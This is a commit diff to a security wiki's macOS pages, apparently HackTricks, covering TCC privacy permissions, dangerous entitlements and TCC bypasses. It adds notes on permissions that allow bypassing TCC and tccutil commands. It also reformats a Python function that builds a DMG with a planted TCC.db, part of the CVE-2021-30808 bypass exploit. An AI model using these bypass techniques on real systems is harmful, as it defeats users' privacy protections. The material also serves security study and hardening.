GITBOOK-4124: change request with no subject merged in GitBook

SUMMARY.md

@@ -185,7 +185,7 @@
     * [macOS TCC](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md)
       * [macOS TCC Bypasses](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md)
         * [macOS Apple Scripts](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md)
-    * [macOS Dangerous Entitlements](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md)
+    * [macOS Dangerous Entitlements & TCC perms](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md)
   * [macOS Users](macos-hardening/macos-security-and-privilege-escalation/macos-users.md)
 * [macOS Red Teaming](macos-hardening/macos-red-teaming/README.md)
   * [macOS MDM](macos-hardening/macos-red-teaming/macos-mdm/README.md)

macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md

@@ -1,4 +1,4 @@
-# macOS Dangerous Entitlements
+# macOS Dangerous Entitlements & TCC perms
 
 <details>
 
@@ -38,6 +38,22 @@ This entitlement allows to **load frameworks, plug-ins, or libraries without bei
 
 This entitlement allows to **use DYLD environment variables** that could be used to inject libraries and code. Check [**this for more info**](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_allow-dyld-environment-variables).
 
+### **`kTCCServiceSystemPolicyAllFiles`**
+
+Gives **Full Disk Access** permissions, one of the TCC highest permissions you can have.
+
+### **`kTCCServiceAppleEvents`**
+
+Allows the app to send events to other applications that are commonly used for **automating tasks**. Controlling other apps, it can abuse the permissions granted to these other apps.
+
+### **`kTCCServiceSystemPolicySysAdminFiles`**
+
+Allows to **change** the **`NFSHomeDirectory`** attribute of a user that changes his home folder and therefore allows to **bypass TCC**.
+
+### **`kTCCServiceSystemPolicyAppBundles`**
+
+Allow to modify apps inside their folders (inside app.app), which is disallowed by default.
+
 ## Medium
 
 ### `com.apple.security.cs.allow-jit`

macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md

@@ -26,7 +26,7 @@ It's also possible to **grant apps access** to files by **explicit intents** fro
 
 There is a **user-mode tccd** running per logged in user defined in `/System/Library/LaunchAgents/com.apple.tccd.plist` registering the mach services `com.apple.tccd` and `com.apple.usernotifications.delegate.com.apple.tccd`.
 
-Here you cna see the tccd running as system and as user:
+Here you can see the tccd running as system and as user:
 
 ```bash
 ps -ef | grep tcc
@@ -36,15 +36,17 @@ ps -ef | grep tcc
 
 Permissions are **inherited from the parent** application and the **permissions** are **tracked** based on the **Bundle ID** and the **Developer ID**.
 
-### TCC Database
+### TCC DatabaseS
 
 The selections is then stored in the TCC system-wide database in **`/Library/Application Support/com.apple.TCC/TCC.db`** or in **`$HOME/Library/Application Support/com.apple.TCC/TCC.db`** for per-user preferences. The databases are **protected from editing with SIP**(System Integrity Protection), but you can read them.
 
 {% hint style="danger" %}
-The TCC database in iOS is in **`/private/var/mobile/Library/TCC/TCC.db`**
+The TCC database in **iOS** is in **`/private/var/mobile/Library/TCC/TCC.db`**
 {% endhint %}
 
-Moreover, a process with **full disk access** can **edit the user-mode** database.
+There is a **third** TCC database in **`/var/db/locationd/clients.plist`** to indicate clients allowed to **access location services**.
+
+Moreover, a process with **full disk access** can **edit the user-mode** database. Now an app also needs **FDA** to **read** the database.
 
 {% hint style="info" %}
 The **notification center UI** can make **changes in the system TCC database**:
@@ -123,6 +125,16 @@ Nota that even if one of the databases are inside the users home, **users cannot
 However, remember that users _can_ **delete or query rules** using **`tccutil`** . 
 {% endhint %}
 
+#### Reset
+
+```bash
+# You can reset all the permissions given to an application with
+tccutil reset All app.some.id
+
+# Reset the permissions granted to all apps
+tccutil reset All
+```
+
 ### TCC Signature Checks
 
 The TCC **database** stores the **Bundle ID** of the application, but it also **stores** **information** about the **signature** to **make sure** the App asking to use the a permission is the correct one.
@@ -206,7 +218,9 @@ The extended attribute `com.apple.macl` **can’t be cleared** like other extend
 
 ### TCC Bypasses
 
-
+{% content-ref url="macos-tcc-bypasses/" %}
+[macos-tcc-bypasses](macos-tcc-bypasses/)
+{% endcontent-ref %}
 
 ## References
 

macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md

@@ -392,12 +392,12 @@ hdiutil attach -readonly -owners off -mountpoint ~/Library /tmp/tmp.dmg
 ```python
 # This was the python function to create the dmg
 def create_dmg():
-	os.system("hdiutil create /tmp/tmp.dmg -size 2m -ov -volname \"tccbypass\" -fs APFS 1>/dev/null")
-	os.system("mkdir /tmp/mnt")
-	os.system("hdiutil attach -owners off -mountpoint /tmp/mnt /tmp/tmp.dmg 1>/dev/null")
-	os.system("mkdir -p /tmp/mnt/Application\ Support/com.apple.TCC/")
-	os.system("cp /tmp/TCC.db /tmp/mnt/Application\ Support/com.apple.TCC/TCC.db")
-	os.system("hdiutil detach /tmp/mnt 1>/dev/null")
+    os.system("hdiutil create /tmp/tmp.dmg -size 2m -ov -volname \"tccbypass\" -fs APFS 1>/dev/null")
+    os.system("mkdir /tmp/mnt")
+    os.system("hdiutil attach -owners off -mountpoint /tmp/mnt /tmp/tmp.dmg 1>/dev/null")
+    os.system("mkdir -p /tmp/mnt/Application\ Support/com.apple.TCC/")
+    os.system("cp /tmp/TCC.db /tmp/mnt/Application\ Support/com.apple.TCC/TCC.db")
+    os.system("hdiutil detach /tmp/mnt 1>/dev/null")
 ```
 
 Check the **full exploit** in the [**original writeup**](https://theevilbit.github.io/posts/cve-2021-30808/).